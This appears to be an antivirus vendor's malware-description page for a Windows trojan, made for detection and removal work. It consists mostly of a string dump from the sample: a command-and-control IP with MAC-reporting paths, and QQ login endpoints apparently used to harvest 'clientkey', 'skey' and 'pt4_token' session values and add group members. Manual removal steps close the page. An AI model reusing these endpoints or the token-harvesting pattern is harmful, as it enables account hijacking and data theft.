operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
%d.%d.%d (%s) 0x%x-0x%x
MDp_%d_(
).dmp
GET %s HTTP/1.1
Host: %s%s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
HTTP/1.1
HTTP/1.0
@1_360.exe
%d.%d.%d.%d
xlurl
descr_downurl
list_url
list_cmd
%s /S
/select, %s
%s:%d
&type=%d
POST %s HTTP/1.1
Host: %s
Content-Length: %d
Content-Type:application/x-www-form-urlencoded
kic.disk
mzd.live
kb.mdisk
<4,$?7/'
(3-!0,1'8"5.*2$
%s%d.%d
hXXp://
E:\[Project]\[BaizhuLocalStorage]\Output\Release\BZDownload.pdb
zcÁ
.?AVduReportView@@
.?AV?$CSingleton@VCDownloadAppDataReport@@@QSUtil@@
.?AVCDownloadAppDataReport@@
.?AVCTaskParam2@?$CTaskMgrHelper@VCDownloadAppDataReport@@@minilib@@
.?AVCCURLWrapper@@
.?AVCWebContainer@@
libcurl/7.53.1 WinSSL
%I%X,
.QAY9E?
PeekNamedPipe
GetCPInfo
GetProcessHeap
RegOpenKeyExA
RegCloseKey
CryptImportKey
CryptDestroyKey
CertFreeCertificateContext
GetViewportOrgEx
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
ShellExecuteA
GetKeyState
WinHttpReadData
WinHttpAddRequestHeaders
WinHttpQueryDataAvailable
WinHttpOpenRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpOpen
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpCrackUrl
WinHttpSetTimeouts
:?49) 3)
%9q%S
4448407
(;(=( 65\;U90(F50%0;(?P1O8@0)%(A2TE';@20A2:#:08.089LH _U,B&  ;75JO717150 00% 657W?;%F<<V6#
.text
`.rdata
@.data
@.rsrc
@.reloc
error: [%s] is repeated
%s_%s_%s
reportview
config.xml
DirectUI.js
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
version="%s"
encoding="%s"
standalone="%s"
[%d]%s
RGB(%d,%d,%d)
(%d,%d)
OnVScroll Error pos[%d]
VertScrollBar Show[%d]
HorzScrollBar Show[%d]
duReportView
nSel :%d
ShockwaveFlash.ShockwaveFlash
AddResObj [%s] failed
<Unknown:%d>
failed to loading image[%s]
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
nMozilla post test/1.0
data.goosai.com
x/report/exception
kernel32.dll
page1_check_lk_%d
page1_check_lk_text_%d
page1_check_hk_%d
page1_check_hk_text_%d
page1_bottom_check_group%d
page1_btn_icon_%d
page1_icon_%d
page1_title_%d
page1_check_item_text_%d
page1_check_item_%d
page1_desc_%d
page1_list_item_%d
%.02f %s
page3_check_lk_%d
page3_check_lk_text_%d
page3_check_hk_%d
page3_check_hk_text_%d
page3_bottom_check_group%d
page3_btn_icon_%d
page3_icon_%d
page3_title_%d
page3_check_item_text_%d
page3_check_item_%d
page3_desc_%d
page3_list_item_%d
page3_bottom_check_lk_%d
ntdll.dll
Kernel32.dll
errorUrl
Shell.Explorer
c:\%original file name%.exe

H~Yset.exe_2944:

.text
`.rdata
@.data
.rsrc
.aspack
.adata
t$(SSh
u.hXeM
~%UVW
u$SShe
ws2_32.dll
IPHLPAPI.DLL
oleaut32.dll
ole32.dll
OleAut32.dll
kernel32.dll
ntdll.dll
wininet.dll
user32.dll
shlwapi.dll
gdi32.dll
Kernel32.dll
Shlwapi.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
MapVirtualKeyA
113.17.184.163
/love/cpa06.asp?mac=
hXXp://
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
@Windows 10
Windows Server Technical Preview
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
Windows 2000
Windows XP
Windows Server 2003 R2,
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003,
Windows 98
Web Server Edition
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild
hXXp://1212.ip138.com/ic.asp
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
/mac2/hy.txt
hXXp://113.17.184.163/love/api.asp?type=a
Common.dll
@`AMainFrame.dll
.@&website=VVV.qq.com
&fromSubId=1&subcmd=all&uin=
/love/api.asp?type=b&uid=
/mac2/yqh.txt
hXXp://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.7478418888058513&pt_local_tk=0.3858416392467916
hXXp://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=
clientkey
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
p_uin=; p_skey=; pt4_token=;
length = str.length; i < length; i  ) {
hash = hash * 33   str.charCodeAt(i)
hXXp://ptlogin2.qq.com/pt4_auth?daid=73&appid=715030901&auth_token=
®master=&aid=715030901&s_url=http://connect.qq.com/widget/shareqq/success.html
; skey=
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?groupcount=4&count=4&callbackFun=_GetGroupPortal&uin=
hXXp://qun.qq.com/cgi-bin/qun_mgr/add_group_member
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
WSOCK32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
VVV.dywt.com.cn
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
right-curly-bracket
left-curly-bracket
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
winmm.dll
rasapi32.dll
winspool.drv
advapi32.dll
shell32.dll
comctl32.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
(*.*)

H~Yset.exe_2944_rwx_0051B000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
winmm.dll
ws2_32.dll
rasapi32.dll
gdi32.dll
winspool.drv
advapi32.dll
shell32.dll
ole32.dll
oleaut32.dll
comctl32.dll
wininet.dll
comdlg32.dll
RegCloseKey
ShellExecuteA
InternetCanonicalizeUrlA
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe (190217 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B86.tmp (5873 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ic[1].htm (219 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7BA7.tmp (1425 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B57.tmp (7971 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now